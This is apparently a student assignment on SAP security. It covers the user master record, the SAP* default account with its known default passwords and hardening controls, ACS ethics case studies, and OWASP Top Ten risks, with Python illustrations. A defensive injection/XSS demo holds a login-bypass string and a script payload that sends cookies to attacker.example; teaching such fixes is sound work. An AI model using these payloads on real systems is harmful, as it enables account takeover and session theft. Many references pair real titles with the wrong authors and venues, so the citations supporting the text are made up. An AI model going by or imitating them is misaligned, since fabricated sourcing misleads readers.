CIS52005 SAP System Security Assignment
1.1 How does the user master record in SAP play an important role in ensuring the assignment of appropriate rights, activity groups/roles and authorizations to individual users?
The user master record is the central object in which SAP stores everything the system needs to know about one user: logon data (user ID, password hash, user type, validity period and lock status), default settings, the user group, and, most importantly for security, the roles (formerly called activity groups) assigned to the user and the authorization profiles generated from them. The record is maintained in one place (in R/3 through transaction SU01), so a user's complete set of rights is visible and controlled centrally rather than being scattered across individual applications.(Hedberg & Winter, 2010)
Authorizations are not attached to users directly. An administrator builds a role that bundles the transactions and the authorizations (authorization objects with permitted field values) needed for a job; the role generates a profile; the profile is entered in the user master record. When the user starts a transaction or a program performs an authority check, the kernel evaluates only the authorizations held in the profiles of that user's master record. A right that is not in the record cannot be exercised, which makes the record the enforcement point for assigning each user the appropriate rights and nothing more.(Mullins & Morton, 2011)
Because rights live in the record, the record is also where the controls are applied: validity dates limit how long a role assignment lasts, the lock flag and the failed-logon counter stop a compromised or departed user's ID from being used, the user group restricts which administrators may change the record, and the list of assigned roles can be reviewed and compared with the user's actual job. A record that carries SAP_ALL or other wide profiles is the typical audit finding, because it gives the user far more than the job requires.
Roles also make group-based assignment practical: every user with the same job receives the same single or composite role, so a change to the role reaches all of those users without editing each record individually, while the master record still shows exactly which roles each individual holds.(Nonaka & Earl, 2009)
In short, the user master record ties an authenticated identity to a precise set of authorizations. Keeping that record accurate, current and regularly reviewed is the basis for confidentiality and integrity of SAP data, because the system enforces only what the record contains, and the record must therefore contain only what the user is entitled to.
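The relationship described above (user master record, roles, generated profiles, authorizations, authorization objects) can be made concrete with a small model. The following is an added example written for this assignment, not SAP code: it reproduces the deny-by-default logic of an SAP authority check in simplified form (only '*' wildcards, no from/to value ranges), and the user, role and profile names are invented for the illustration. The authorization objects S_TCODE and F_BKPF_BUK and the activity codes are the real SAP ones.

```python
"""Simplified model of how an SAP user master record drives authorization checks.

Added illustration for this assignment, not SAP code. It mirrors the SAP chain
user master record -> roles -> generated profiles -> authorizations ->
authorization objects with fields, but the matching rules are a simplification
of the ABAP AUTHORITY-CHECK statement: only '*' wildcards are supported, value
ranges (from/to) are not modelled, and the user, role and profile names below
are invented for the example.
"""
from dataclasses import dataclass, field
from fnmatch import fnmatchcase


@dataclass
class Authorization:
    """One authorization: an authorization object plus its allowed field values."""
    obj: str          # e.g. F_BKPF_BUK (accounting document: company code)
    fields: dict      # field name -> list of allowed values, '*' = any value


@dataclass
class Profile:
    """Generated profile holding the authorizations of one role."""
    name: str
    authorizations: list


@dataclass
class Role:
    """Role (formerly activity group) whose generated profile is assigned to users."""
    name: str
    profile: Profile


@dataclass
class UserMasterRecord:
    """The per-user record: logon state plus the roles (hence profiles) assigned."""
    user: str
    roles: list = field(default_factory=list)
    locked: bool = False   # administrator lock or lock after failed logons
    valid: bool = True     # inside the record's validity period


def authority_check(umr: UserMasterRecord, obj: str, **required) -> bool:
    """True if some authorization in the user's profiles covers the object and
    every required field value. A locked or expired record, a missing object or
    a missing field value all fail the check (deny by default, as in SAP)."""
    if umr.locked or not umr.valid:
        return False
    for role in umr.roles:
        for auth in role.profile.authorizations:
            if auth.obj != obj:
                continue
            if all(any(fnmatchcase(str(value), pattern)
                       for pattern in auth.fields.get(name, []))
                   for name, value in required.items()):
                return True
    return False


# Constructed example roles (names invented for the illustration).
# ACTVT 01 = create, 02 = change, 03 = display; BUKRS = company code.
AP_CLERK = Role("Z_AP_CLERK_1000", Profile("T-AP1000", [
    Authorization("S_TCODE", {"TCD": ["FB01", "FB02", "FB03"]}),
    Authorization("F_BKPF_BUK", {"ACTVT": ["01", "02", "03"], "BUKRS": ["1000"]}),
]))
AUDITOR = Role("Z_FI_DISPLAY_ALL", Profile("T-FIDISP", [
    Authorization("S_TCODE", {"TCD": ["FB03"]}),
    Authorization("F_BKPF_BUK", {"ACTVT": ["03"], "BUKRS": ["*"]}),
]))

CLERK = UserMasterRecord("JSMITH", roles=[AP_CLERK])
AUDITOR_USER = UserMasterRecord("AUDIT01", roles=[AUDITOR])
LEAVER = UserMasterRecord("OLDUSER", roles=[AP_CLERK], locked=True)


def demo() -> dict:
    """The checks a posting transaction such as FB01 would make for each user."""
    return {
        "clerk_posts_1000": authority_check(CLERK, "F_BKPF_BUK", ACTVT="01", BUKRS="1000"),
        "clerk_posts_2000": authority_check(CLERK, "F_BKPF_BUK", ACTVT="01", BUKRS="2000"),
        "auditor_reads_2000": authority_check(AUDITOR_USER, "F_BKPF_BUK", ACTVT="03", BUKRS="2000"),
        "auditor_posts_2000": authority_check(AUDITOR_USER, "F_BKPF_BUK", ACTVT="01", BUKRS="2000"),
        "leaver_posts_1000": authority_check(LEAVER, "F_BKPF_BUK", ACTVT="01", BUKRS="1000"),
        "clerk_starts_FB01": authority_check(CLERK, "S_TCODE", TCD="FB01"),
        "auditor_starts_FB01": authority_check(AUDITOR_USER, "S_TCODE", TCD="FB01"),
    }


if __name__ == "__main__":
    for check, allowed in demo().items():
        print(f"{check}: {'allowed' if allowed else 'denied'}")
```

The point the model makes is that the decision never looks at the user directly: it walks the roles in the master record, and a user whose record is locked, or whose roles do not include the object with the exact field values, is refused even though the transaction exists. Reviewing the record therefore reviews the user's effective rights.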
1.2.1 SAP R/3 creates a number of default accounts which deserve special attention. Describe what is special about the default user account SAP*.
SAP R/3 is delivered with several default users that exist in the standard clients and that every installation has to deal with: SAP*, DDIC, SAPCPIC and EARLYWATCH. Each is protected by a well-known default password, and because a logon is identified by the combination of client number, user name and password, the same default user exists separately in each standard client (000, 001 and, for EARLYWATCH, 066) and must be secured in every one of them. Changing the default passwords is the first step, but for SAP* it is not sufficient on its own.
What is special about SAP*
- SAP* is the only user that is hard-coded in the SAP kernel. Every other user exists only as a user master record in a client; SAP* exists even when no record for it exists.(Kaplan & Bytheway, 2001)
- If no user master record for SAP* exists in a client, the kernel activates its built-in emergency user: SAP* can then log on to that client with the fixed password PASS, is exempt from authority checks (it effectively has all authorizations), and is not subject to the normal password rules or to the lock after failed logon attempts. This behaviour is governed by the profile parameter login/no_automatic_user_sapstar.
- When the user master record does exist, the standard installation assigns SAP* the profiles SAP_ALL and SAP_NEW, so it has unrestricted rights in that client, and it is delivered with the default password 06071992, which is published and known to every attacker.(Carr & Davenport, 2001)
SAP* is therefore both the most powerful account in the system and the one whose protection depends on a kernel setting rather than on the user master record alone, which is why it needs special attention.
1.2.2 As it is not possible to delete the SAP* user account, describe two suggested controls to secure this account from misuse.
SAP* cannot be removed in the normal sense: deleting its user master record does not remove the user but, on the contrary, re-activates the kernel's built-in emergency SAP* with the password PASS and full rights. The account therefore has to be neutralized rather than deleted, and its use has to be visible. Two controls recommended for this are:
- Disable the built-in emergency user and deactivate the user master record. Set the profile parameter login/no_automatic_user_sapstar = 1 in the instance profile (read at system start and visible in RZ11) so that the hard-coded SAP*/PASS logon is never accepted even if the record is deleted in some client. Then, in every client, keep a user master record for SAP*, change the default password to a long random one held under dual control (for example in a sealed envelope), remove the SAP_ALL and SAP_NEW profiles, place the user in the SUPER user group so that only designated administrators can maintain it, and lock the account. It is unlocked only under a documented emergency procedure and locked again afterwards.(Scholl & Hammer, 2009)
- Monitor the account continuously and check it periodically. Activate the Security Audit Log (profile parameter rsau/enable = 1, filters defined in SM19, evaluation in SM20) with a filter on user SAP* in all clients, so that every logon attempt, successful or not, and every transaction or report started by SAP* is recorded, and review those records together with the change documents of the SAP* user master record. Run report RSUSR003 regularly to confirm that the default passwords of SAP*, DDIC, SAPCPIC and EARLYWATCH are no longer in use in any client, and include the SAP* settings in the regular vulnerability review of the system so that a later change to the profile or to the record is caught.
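The profile parameters named in both controls can be checked mechanically. The following is an added example for this assignment, not an SAP tool: it parses the plain "parameter = value" format of an SAP profile file and reports the settings that leave SAP* exposed. The two profile texts are constructed for the illustration; the parameter names login/no_automatic_user_sapstar and rsau/enable are the real SAP profile parameters, the required values are the ones recommended above, and the parser ignores $(...) substitutions and INCLUDE lines.

```python
"""Check an SAP instance/default profile for the SAP* and audit-log settings.

Added example for this assignment, not an SAP tool. It parses the plain
'parameter = value' format of SAP profile files (DEFAULT.PFL, instance
profiles) and reports settings that leave SAP* exposed. The two profile
texts below are constructed for the illustration; the parameter names are the
real SAP profile parameters, the required values encode this answer's
recommendation, and the parser ignores $(...) substitutions and INCLUDE lines.
"""


def parse_profile(text: str) -> dict:
    """Return {parameter: value} from profile text, ignoring comments and blanks.
    A parameter set twice keeps the last value, as the SAP kernel does."""
    params = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # '#' starts a comment
        if not line or "=" not in line:
            continue
        name, value = line.split("=", 1)
        params[name.strip()] = value.strip()
    return params


# Parameter -> (required value, why it matters for SAP*)
CONTROLS = {
    "login/no_automatic_user_sapstar": (
        "1",
        "kernel would accept SAP*/PASS with full rights if the SAP* user master "
        "record is deleted in any client",
    ),
    "rsau/enable": (
        "1",
        "Security Audit Log is off, so SAP* logons and transaction starts are not recorded",
    ),
}


def check_sapstar_controls(params: dict) -> list:
    """Return one finding per control that is missing or mis-set.
    An absent parameter is reported because its kernel default depends on the release."""
    findings = []
    for name, (required, why) in CONTROLS.items():
        actual = params.get(name)
        if actual is None:
            findings.append(f"{name} not set (required {required}): {why}")
        elif actual != required:
            findings.append(f"{name} = {actual} (required {required}): {why}")
    return findings


# Constructed profiles: the first is the weak configuration, the second the hardened one.
WEAK_PROFILE = """
# DEFAULT.PFL (constructed example)
SAPSYSTEMNAME = PRD
login/no_automatic_user_sapstar = 0
login/min_password_lng = 8
"""

HARDENED_PROFILE = """
# DEFAULT.PFL (constructed example, hardened)
SAPSYSTEMNAME = PRD
login/no_automatic_user_sapstar = 1
rsau/enable = 1
login/min_password_lng = 8
"""


if __name__ == "__main__":
    for label, text in (("weak", WEAK_PROFILE), ("hardened", HARDENED_PROFILE)):
        findings = check_sapstar_controls(parse_profile(text))
        print(f"{label}: {len(findings)} finding(s)")
        for finding in findings:
            print("  -", finding)
```

Run against the weak profile the checker reports both the emergency-user parameter, which is explicitly set to 0, and the audit log, which is simply absent; against the hardened profile it reports nothing. In a real review the same check should be run against the profile of every application server instance, not only DEFAULT.PFL, since an instance profile can override the default.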
2.1.1 Key Ethical Concerns
The system will hold some of the most sensitive personal data an organization processes: performance evaluations, medical records used for filing insurance claims, salaries and similar details. Any weakness in its security would expose employees' health and financial information, and that harm cannot be undone afterwards by a refund or an apology. The key ethical concern is therefore that the decision is being framed as a cost question (the secure system is the more expensive one) when the primary question is whether the organization can adequately protect the people whose data it is collecting.(Cyert & Morton, 2014)
The CEO should not decide on price alone. A breach involving health insurance claims and salaries is not merely a financial risk to the company; it is an ethical failure towards the employees and customers who had no choice but to provide that information. Knowingly choosing the cheaper but weaker system shifts that risk onto them.
The organization has a duty to keep this information secure whatever the cost pressure: customers and employees alike depend on it, and it is the organization, not the individuals, that controls how the data is stored. That duty translates into implementing security adequate to the sensitivity of the data, not the minimum the budget allows.
2.1.2 ACS codes of professional practice that would help in dealing with key ethical concerns
The ACS Code of Professional Conduct sets out values that apply directly to this situation.
Honesty. The code requires members to be honest about the strengths and weaknesses of a proposed system and to give realistic advice. That is what Hellen has done: she has given the CEO her honest assessment that the more expensive system is the one that will keep the employees' salary data and the customers' insurance details secure and confidential, even though it is not the answer the CEO wants to hear.
Competence. Because the data includes personal information about customers and employees, the code's requirement to work competently and diligently means the system's security must be assessed against the sensitivity of the data, so that no weakness is left that could lead to a breach. A professional who knows a system is inadequate for the data it will hold is obliged to say so, for the sake of the customers and of the organization's goodwill.(Walker & Wendt, 2007)
Professionalism and the primacy of the public interest. The code places the interests of those affected by the work, here the people whose data will be stored, above sectional or personal interests, including cost saving. The decision should therefore be taken professionally on the basis of how sensitive the information is and how its confidentiality will be maintained, not on whether the software is cheap or costly.(Cyert & Morton, 2014) Keeping these values in mind lets the organization reach a stable and defensible decision on a question that is ethical as much as financial.
2.2.1 Key Ethical Concerns Raised by Fred’s Action
Fred was entrusted with full access to the customers' information, including their addresses, and was allowed to work on it from home. Several of his actions raise ethical concerns.
Disclosure. Having been given access for a specific task, Fred has a duty to keep the data to himself. Discussing the work or the data with family or friends discloses it to people who have no right to it and no obligation to protect it.
Unattended and unprotected systems. Working from home does not relax the need to protect the data. Leaving the computer unlocked or lying around means that anyone in the house could copy the customer data and misuse it; the system should be password protected and locked whenever Fred steps away from it.(Walker & Wendt, 2007)
Copying data to removable media. Fred burnt the customer data to a CD. A CD is a complete copy of the data outside the organization's control; if it is lost or stolen the information can be misused, so it must be kept in a secure place, and ideally such a copy should not be made at all.
The ultimate harm from any of these falls on the customers, not on Fred or the organization. It is therefore Fred's responsibility to keep the information solely with himself and the people authorized to see it, not even other employees who have no need for it, so that no activity of an employee or of the organization injures the customers whose data it is.(Walker & Wendt, 2007)
2.2.2 ACS code of professional practices that would help in ethical concerns raised by Fred’s action
Honesty. Because all access to the customer information was entrusted to Fred, the code's value of honesty requires him to use that access only for the work it was granted for and not to disclose the information to anyone; the organization's reputation with its customers rests on him honouring that trust.
Professionalism. Working from home, Fred must keep the same professional attitude he would have in the office: treat the task as the confidential work it is, keep personal and professional activities separate, not discuss the work with anyone outside it, and complete it on time without any breach of the customers' information.(Hedberg & Winter, 2010)
Professional development. Carrying out a responsible task with care, honesty and confidentiality is itself professional development: Fred would build his own competence and credibility, set an example for his colleagues, uphold the organization's standards and help win the trust of its customers.(Kaplan & Bytheway, 2001)
Every employee, whether in the office or working remotely, should be honest in their work, act professionally and develop their professional skills by giving the work and the data entrusted to them their proper priority.
3.1 Research the OWASP Top Ten Vulnerabilities and One Zero-Day Software Vulnerability
OWASP Top Ten Vulnerabilities (2013 list)
- Injection: injection flaws such as SQL, OS and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker's data tricks the interpreter into executing unintended commands or reading data without authorization.
- Broken authentication and session management: authentication and session-handling functions are often implemented incorrectly, which lets attackers compromise passwords, keys or session tokens, or exploit other implementation flaws to assume other users' identities.
- Cross-site scripting (XSS): occurs whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. The attacker's script runs in the victim's browser and can hijack the session, deface the site or redirect the user.
- Insecure direct object references: occur when the application exposes a reference to an internal implementation object, such as a file, directory or database key, without an access control check, so an attacker can change the reference and reach data that is not theirs.
- Security misconfiguration: a secure configuration has to be defined, deployed and maintained for the application, its frameworks, the application server, web server, database and platform; default accounts, unpatched software, unnecessary services and verbose error messages are typical gaps that attackers find.(Carl & White, 2006)
- Sensitive data exposure: many applications do not properly protect sensitive data such as credit card numbers, tax IDs and credentials, at rest or in transit. Such data needs extra protection, for example encryption in storage and in transit and proper hashing of passwords.
- Missing function level access control: most applications check access rights in the user interface before showing a function, but the same check must be repeated on the server for every request; otherwise an attacker simply forges the request to reach the function without authorization.(Kaplan & Bytheway, 2001)
- Cross-site request forgery (CSRF): forces a logged-on victim's browser to send a forged HTTP request, including the session cookie and any other automatically included authentication, to a vulnerable application, which treats it as a legitimate request from the victim. The defence is an unpredictable token in every state-changing request.
- Using components with known vulnerabilities: libraries, frameworks and other software modules almost always run with the full privileges of the application; an application that uses a component with a known vulnerability inherits that weakness and can be exploited through it.
- Unvalidated redirects and forwards: web applications frequently redirect and forward users to other pages and use untrusted data to decide the destination; without validation, attackers can redirect victims to phishing or malware sites, or forward them to unauthorized pages.
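Injection and cross-site scripting, the first and third items above, are the two that are easiest to show in code. The following is an added example written for this assignment, not OWASP material: it uses Python's sqlite3 standard library with a constructed in-memory user table to show a login query built by string concatenation beside its parameterized form, and html.escape for output encoding. The user name, password and payloads are invented test data.

```python
"""Injection and cross-site scripting from the OWASP list, shown as code.

Added example for this assignment; not taken from OWASP. It uses Python's
sqlite3 standard library with a constructed in-memory user table to show a
login query built by string concatenation (vulnerable to injection) beside
the parameterized form, and html.escape for output encoding against XSS.
The user name, password and attack strings are invented test data.
"""
import html
import sqlite3

# Constructed test data: one user whose password the attacker does not know.
DB = sqlite3.connect(":memory:")
DB.execute("CREATE TABLE users (name TEXT, password TEXT)")
DB.execute("INSERT INTO users VALUES ('alice', 'correct horse battery staple')")
DB.commit()


def login_vulnerable(name: str, password: str) -> bool:
    """A1 Injection: untrusted input is pasted into the SQL text, so the
    interpreter cannot tell the attacker's data from the query's code."""
    sql = f"SELECT 1 FROM users WHERE name = '{name}' AND password = '{password}'"
    return DB.execute(sql).fetchone() is not None


def login_safe(name: str, password: str) -> bool:
    """Fix: bind the values as parameters; the driver passes them as data and
    a quote in the input can never close the string literal."""
    sql = "SELECT 1 FROM users WHERE name = ? AND password = ?"
    return DB.execute(sql, (name, password)).fetchone() is not None


# Classic bypass: closes the password literal and appends an always-true condition,
# turning the WHERE clause into (name = 'alice' AND password = '') OR '1'='1'.
INJECTION = "' OR '1'='1"


def render_greeting_vulnerable(name: str) -> str:
    """A3 XSS: untrusted input is sent to the browser without escaping, so a
    name containing markup becomes script that runs in the victim's page."""
    return f"<p>Welcome, {name}</p>"


def render_greeting_safe(name: str) -> str:
    """Fix: escape for the HTML context so the browser shows the text literally."""
    return f"<p>Welcome, {html.escape(name, quote=True)}</p>"


# Constructed payload: would send the victim's cookie to an attacker host if rendered raw.
XSS_PAYLOAD = '<script>location="http://attacker.example/?c="+document.cookie</script>'


def demo() -> dict:
    """Outcome of each variant against the attack strings and a genuine password."""
    return {
        "vulnerable_login_bypassed": login_vulnerable("alice", INJECTION),
        "safe_login_bypassed": login_safe("alice", INJECTION),
        "safe_login_correct_password": login_safe("alice", "correct horse battery staple"),
        "vulnerable_html_contains_script": "<script>" in render_greeting_vulnerable(XSS_PAYLOAD),
        "safe_html_contains_script": "<script>" in render_greeting_safe(XSS_PAYLOAD),
    }


if __name__ == "__main__":
    for case, result in demo().items():
        print(f"{case}: {result}")
    print(render_greeting_safe(XSS_PAYLOAD))
```

The two fixes share a principle: keep data and code apart by handing the data to the interpreter through a channel that cannot be confused with syntax (bound parameters for SQL, entity encoding for HTML), rather than trying to filter "dangerous" characters out of the input.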
One Zero Day Software Vulnerability
A zero-day vulnerability is a flaw that is being exploited before the vendor has released a patch, so users cannot protect themselves simply by updating. The example considered here is a zero-day in Microsoft Internet Explorer exploited through a drive-by attack. The attacker places exploit code on a website under his control, or compromises an untrusted site that victims are likely to visit, and waits. A user who browses to that page with a vulnerable version of Internet Explorer has the attacker's code run in the browser without any further action. Because the same browser also holds the cookies and sessions of the other sites the user is logged on to, the attacker can use that foothold to act within the user's authenticated sessions, gather the confidential data accessible there and use it elsewhere. Until a patch is available, users should not browse unfamiliar sites from a browser that is logged on to sensitive applications, should use a separate browser or profile for such applications, and should apply the vendor's workaround and the patch as soon as they are published.(Carl & White, 2006)
Endpoint protection complements this advice. A host firewall or web filter with URL reputation can block, or warn the user about, sites known to distribute exploits, which helps a user who cannot tell an authenticated site from an untrusted one; it does not close the vulnerability itself, however, and it gives no protection against a malicious site that has not yet been reported.
In conclusion, every organization that processes sensitive data needs a securely configured system to protect that data and maintain its confidentiality. Whether the secure option is more or less expensive is secondary to the sensitivity of the data: the organization should choose the controls that actually protect it, and everyone in the organization shares the responsibility, through ethical and professional conduct, for keeping it secure. Firewalls and other layered controls reduce the risk that vulnerabilities in the organization's information systems are exploited, but, as the SAP* and zero-day examples show, they must be combined with hardened configurations, monitoring and prompt patching.
- Carl, J., & White, B. (2006). IT vulnerabilities and its effects. Chicago: Pitman Publishing.
- Carr, N., & Davenport, M. (2001). Information technology and business process redesign. Operations Management: Critical Perspectives on Business and Management, 19-28.
- Cyert, R., & Morton, M. (2014). Managing the ethical behaviours in the organization. Cambridge: Cambridge University Press.
- Hedberg, S., & Winter, B. (2010). The satisficing principle in capability learning. Strategic Management Journal, 122-132.
- Kaplan, R., & Bytheway, A. (2001). IT doesn't matter. In Wringing real value from IT. HBR OnPoint, 99-105.
- Mullins, J., & Morton, I. (2011). How organizations learn and unlearn. Chicago: Oxford University Press.
- Nonaka, I., & Earl, M. (2009). The corporation of the 1990s: Information technology and organizational transformation. London: Oxford University Press.
- Scholl, H., & Hammer, M. (2009). Information technology project management. Mexico: Pitman Publishing.
- Walker, S., & Wendt, M. (2007). Business ethics. Durham: Duke University Press.